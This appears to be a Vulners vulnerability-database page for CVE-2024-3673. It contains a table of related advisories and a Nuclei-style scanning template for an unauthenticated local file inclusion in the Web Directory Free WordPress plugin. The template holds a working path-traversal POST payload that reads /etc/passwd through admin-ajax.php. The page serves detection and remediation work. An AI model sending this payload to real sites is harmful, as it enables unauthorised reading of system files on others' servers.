| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Exploit for CVE-2024-3673 | 24 Jan 202521:50 | – | githubexploit | |
| The vulnerability of the `include` function in the Web Directory Free plugin of the WordPress content management system arises from an incorrect limitation on the path to the restricted catalog. This allows attackers to execute arbitrary code. | 26 Mar 202500:00 | – | bdu_fstec | |
| CVE-2024-3673 | 30 Aug 202408:57 | – | circl | |
| WordPress plugin Web Directory Free 安全漏洞 | 30 Aug 202400:00 | – | cnnvd | |
| CVE-2024-3673 | 30 Aug 202406:00 | – | cve | |
| CVE-2024-3673 Web Directory Free < 1.7.3 - Unauthenticated LFI | 30 Aug 202406:00 | – | cvelist | |
| CVE-2024-3673 | 30 Aug 202406:15 | – | nvd | |
| CVE-2024-3673 | 30 Aug 202406:15 | – | osv | |
| WordPress Web Directory Free plugin < 1.7.3 - Unauthenticated LFI vulnerability | 30 Aug 202406:49 | – | patchstack | |
| WordPress Web Directory Free Plugin < 1.7.3 is vulnerable to Local File Inclusion | 30 Aug 202400:00 | – | patchstack |
id: CVE-2024-3673
info:
name: Web Directory Free < 1.7.3 - Local File Inclusion
author: s4e-io
severity: critical
description: |
The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues.
impact: |
Unauthenticated attackers can exploit LFI to read sensitive files including /etc/passwd via the template parameter.
remediation: |
Update Web Directory Free to version 1.7.3 or later.
reference:
- https://wpscan.com/vulnerability/0e8930cb-e176-4406-a43f-a6032471debf/
- https://nvd.nist.gov/vuln/detail/CVE-2024-3673
- https://vuldb.com/?id.276216
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.1
cve-id: CVE-2024-3673
epss-score: 0.05578
epss-percentile: 0.91929
metadata:
verified: true
max-request: 2
vendor: salephpscripts
product: web-directory-free
publicwww-query: "/wp-content/plugins/web-directory-free"
tags: cve,cve2024,wordpress,wp-plugin,wp,lfi,web-directory-free,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/web-directory-free")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
from_set_ajax=1&action=w2dc_controller_request&template=../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 490a0046304402205eea027e8fbdf502890399ee273dcb81d06f657450435531e53ba3905cb3a52902206a8321cedb1393d9fb50a9280b65347c354a85d93f3b690d65db75e79c2a2a85:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation